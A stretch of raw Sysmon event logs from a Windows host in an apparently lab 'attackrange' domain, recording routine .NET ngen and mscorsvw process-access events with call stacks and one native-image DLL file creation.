13:46:21.218{59A5CD1D-90A0-6005-2E01-00000000A301}47125100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-912D-6005-D801-00000000A301}4616C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006049Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:46:21.187{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-912D-6005-D701-00000000A301}4336C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006048Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:21.171{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-912D-6005-D701-00000000A301}4336C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006047Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:46:21.171{59A5CD1D-90A0-6005-2E01-00000000A301}47125100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-912D-6005-D701-00000000A301}4336C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006046Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:46:21.125{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-912D-6005-D601-00000000A301}3916C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006045Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:21.125{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-912D-6005-D601-00000000A301}3916C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006044Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:46:21.125{59A5CD1D-90A0-6005-2E01-00000000A301}47125100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-912D-6005-D601-00000000A301}3916C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006043Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:46:21.078{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-912D-6005-D501-00000000A301}3968C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006042Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:21.062{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-912D-6005-D501-00000000A301}3968C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006041Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:46:21.062{59A5CD1D-90A0-6005-2E01-00000000A301}47125100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-912D-6005-D501-00000000A301}3968C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006040Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:46:21.000{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-912C-6005-D401-00000000A301}1404C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x80000000000000006092Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:46:22.984{59A5CD1D-912E-6005-E501-00000000A301}3676C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\e5c-0\Microsoft.Transactions.Bridge.dll2021-01-18 13:46:22.984 10341000x80000000000000006091Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:46:22.140{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-912E-6005-E501-00000000A301}3676C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006090Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:22.125{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-912E-6005-E501-00000000A301}3676C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006089Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:46:22.125{59A5CD1D-90A0-6005-2E01-00000000A301}47124864C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-912E-6005-E501-00000000A301}3676C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+91db|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9168|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8fc5|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006088Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:22.031{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-912E-6005-E401-00000000A301}2856C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 
10341000x80000000000000006087Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:22.015{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-912E-6005-E401-00000000A301}2856C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006086Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:22.015{59A5CD1D-90A0-6005-2E01-00000000A301}47125100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-912E-6005-E401-00000000A301}2856C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+
84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006108Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:23.796{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-912F-6005-EA01-00000000A301}880C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006107Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:23.796{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-912F-6005-EA01-00000000A301}880C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006106Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:46:23.796{59A5CD1D-90A0-6005-2E01-00000000A301}47124864C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-912F-6005-EA01-00000000A301}880C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+91db|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9168|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8fc5|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006105Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:23.546{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-912F-6005-E901-00000000A301}3656C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 
10341000x80000000000000006104Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:23.531{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-912F-6005-E901-00000000A301}3656C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006103Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:23.531{59A5CD1D-90A0-6005-2E01-00000000A301}47125100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-912F-6005-E901-00000000A301}3656C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL
